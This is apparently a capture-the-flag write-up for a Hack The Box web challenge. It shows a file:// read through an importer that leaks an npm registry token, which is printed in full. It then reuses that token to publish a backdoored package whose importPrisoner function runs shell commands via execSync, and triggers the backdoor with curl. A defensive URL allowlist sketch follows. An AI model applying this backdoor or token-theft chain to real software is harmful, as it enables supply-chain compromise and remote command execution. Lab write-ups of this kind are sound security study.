https://app.hackthebox.com/challenges/715

Description

One of our crew members has been captured by mutant raiders and is locked away in their heavily fortified prison. During an initial reconnaissance, the crew managed to gain access to the prison’s record management system. Your mission: exploit this system to infiltrate the prison’s network and disable the defenses for the rescuers. Can you orchestrate the perfect escape and rescue your comrade before it’s too late?

Exploitation

Challenge instance IP and port: 94.237.60.154:32828

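The Prisoner Importer uses curl under the hood, so it accepts a file:// URL. Enter this as the record URL:

file:///home/node/.npmrc

Click on Import Prisoner Record. The imported record is the content of .npmrc, which holds the registry auth token: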

//localhost:4873/:_authToken="MWZlMmI1OTRiZjMwNTJkMjYwNWZhYTE1NGJlNTVjZDQ6OGRjNDBlMDE3YWNhYjViYzEwM2RlOTQzYzg3OWZiN2YwY2EyZGI5ZmMwMGI4ZWViZWVhZmUzZjc0Y2I2MWFiOTZmNWI1OWVhNTg0N2IwZmIwZQ=="

Add the registry host name to the hosts file:

94.237.60.154 registry.prison-pipeline.htb

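In the local copy of the package, edit .npmrc:

cd challenge/prisoner-db
nano .npmrc

Contents of .npmrc (the leaked token, pointed at the exposed registry host):
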
//registry.prison-pipeline.htb:32828/:_authToken="MWZlMmI1OTRiZjMwNTJkMjYwNWZhYTE1NGJlNTVjZDQ6OGRjNDBlMDE3YWNhYjViYzEwM2RlOTQzYzg3OWZiN2YwY2EyZGI5ZmMwMGI4ZWViZWVhZmUzZjc0Y2I2MWFiOTZmNWI1OWVhNTg0N2IwZmIwZQ=="
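
Clear the npm cache and confirm that the registry accepts the token:

npm cache clean --force
npm whoami --registry=http://registry.prison-pipeline.htb:32828

Add the backdoor to importPrisoner in index.js:

nano index.js
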
    async importPrisoner(url) {
        // implement backdoor
        const child_process = require('child_process');
        if (url.includes('PWN:')) {
            try {
                let cmd = url.replace('PWN:', '');
                let output = child_process.execSync(cmd).toString();
                return output;
            }
            catch (error) {
                return 'PWN: Error executing command.';
            }
        }        
        ...SNIP...
    }
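
Bump the version in package.json:

nano package.json
"version": "1.0.1",

Publish the modified package, wait a few seconds, then call the import endpoint with the PWN: prefix:

npm publish --registry=http://registry.prison-pipeline.htb:32828
sleep 5
curl -X POST 'http://94.237.60.154:32828/api/prisoners/import' -H 'Content-Type: application/json' -d '{"url": "PWN:/readflag"}'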
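
The first step of the chain works because the importer passes any URL scheme and any host to curl. As an added example (not code from the challenge or from this write-up), here is a scheme and host allowlist that an import handler could apply before fetching; validateImportUrl and isInternalIPv4 are hypothetical names.

```javascript
// Added example: allowlist check for the importer's "url" field.
// validateImportUrl and isInternalIPv4 are hypothetical names, not the challenge's code.
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// True for unspecified, loopback, RFC 1918 and link-local IPv4 addresses.
function isInternalIPv4(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return false;
  const [a, b] = [Number(m[1]), Number(m[2])];
  return a === 0 || a === 10 || a === 127 ||
    (a === 169 && b === 254) ||
    (a === 172 && b >= 16 && b <= 31) ||
    (a === 192 && b === 168);
}

function validateImportUrl(raw) {
  let u;
  try {
    u = new URL(raw); // WHATWG parser also normalises forms like http://2130706433/
  } catch {
    return { ok: false, reason: 'unparseable URL' };
  }
  if (!ALLOWED_SCHEMES.has(u.protocol)) {
    return { ok: false, reason: `scheme ${u.protocol} not allowed` };
  }
  if (u.username || u.password) {
    return { ok: false, reason: 'credentials in URL not allowed' };
  }
  const host = u.hostname.toLowerCase();
  if (host === 'localhost' || host.endsWith('.localhost')) {
    return { ok: false, reason: 'loopback host' };
  }
  if (host.startsWith('[')) {
    return { ok: false, reason: 'IPv6 literals rejected in this sketch' };
  }
  if (isInternalIPv4(host)) {
    return { ok: false, reason: 'internal IPv4 address' };
  }
  return { ok: true, reason: 'allowed' };
}

// Constructed sample inputs: the values used on this page plus a benign one.
for (const s of ['file:///home/node/.npmrc', 'PWN:/readflag',
                 'http://localhost:4873/', 'https://example.com/record.json']) {
  console.log(s, '->', validateImportUrl(s).reason);
}
```

A host name that resolves to an internal address still passes this string check, so the fetch itself should resolve the name, re-check the address and connect to that address only. Restricting curl with --proto "=http,https" adds a second barrier against file:// at the fetch layer.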

Summary

Prison Pipeline: reduce the custom rules to a scriptable check and use the smallest reliable path to the flag.